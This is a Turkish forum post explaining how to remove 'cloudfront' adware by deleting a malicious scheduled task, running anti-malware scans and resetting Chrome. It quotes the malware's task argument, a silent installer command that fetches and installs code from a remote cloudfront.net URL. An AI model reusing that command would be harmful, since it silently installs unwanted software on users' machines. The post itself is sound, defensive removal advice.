Cloudfront Virüsünden Kurtulmak

Whistle

Ruhsuz Filozof
Kurucu
Kurumsal Üye
Geliştirici
Yardımsever Üye
Mesaj
11.494
Çözümler
546
Beğeni
12.042
Puan
5.864
Merhaba arkadaşlar,
Bazen crackli program indirmek için girdiğimiz siteler ne yazık ki virüs içerikli dosyaları indirtebiliyor.
Benim başıma da buna benzer bir şey geldi ve çözümünü sizinle paylaşmak istiyorum.

Mallware olarak bilinen cloudfront virüsünden sizinle bahsedeceğim. Bu virüsün amacı bilgisayarınıza reklam içeren tarayıcı ve programları kurmak. Öyle güçlü şeyler kuruyor ki sistemdeki antivirüs programları bile kendini kapatıyor. Ne kadar başlangıç taraması filan yapsamda sadece bunun kurduğu dosyaları virüs olarak gösteriyordu ama kaynağın nereden geldiği belli değildi.

Bunun sebebi de zamanlanmış görevlere;
Kod:
/i hTTp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=<hdd markası>&d=20170401 /q
şöyle bir link eklemesi. Bu görev belirlenen vakitte çalışarak sisteminize virüs içeren tarayıcılar kurmaktadır.

Bundan kurtulmak için ilk önce Windows'un
"Task Scheduler" yani "Zamanlanmış Görevler" kısmına girmeniz. Windows 10'da başlattan aratırsanız çıkar.
cloudfront virüs.jpg


Gördüğünüz gibi cloudfront zamanlanmış görevini bulduk. Bunu isterseniz silin. İstersenizde devredışı bırakabilirsiniz.

Bu zamanlanmış görevi sildikten sonra yapmamız gereken şeyler var tabikide.
Öncelikle bu zamanlanmış görevin kurduğu programları tespit edip silmeniz gerekiyor. Mallwarebytes, Zemana Antimallware gibi yazılımlarla virüsün kurduğu programları tespit edebilirsiniz.
Bundan sonra ise tarayıcınızın çerezlerine filan bu veriler girdiği için tarayıcınızın ayarlarını sıfırlamanız gerekiyor.

Google Chrome;
Ayarlar => Gelişmiş Ayarları Yönet => Ayarları Sıfırlayın
dediğiniz zaman tarayıcınız temizlenecektir.

Günlerce iflağımı s*ken virüsün aslına ne kadar kolay bir yerde olduğunu görünce şaşırdım. Önerilerime gelirsek. Her böyle sorunlarda format atmak yerine virüsün kaynağını bulmanızı öneririm. Aynı şekilde .exe dosyalarını açarken dikkatli olalım.
 
Son düzenleme:
Geri
Üst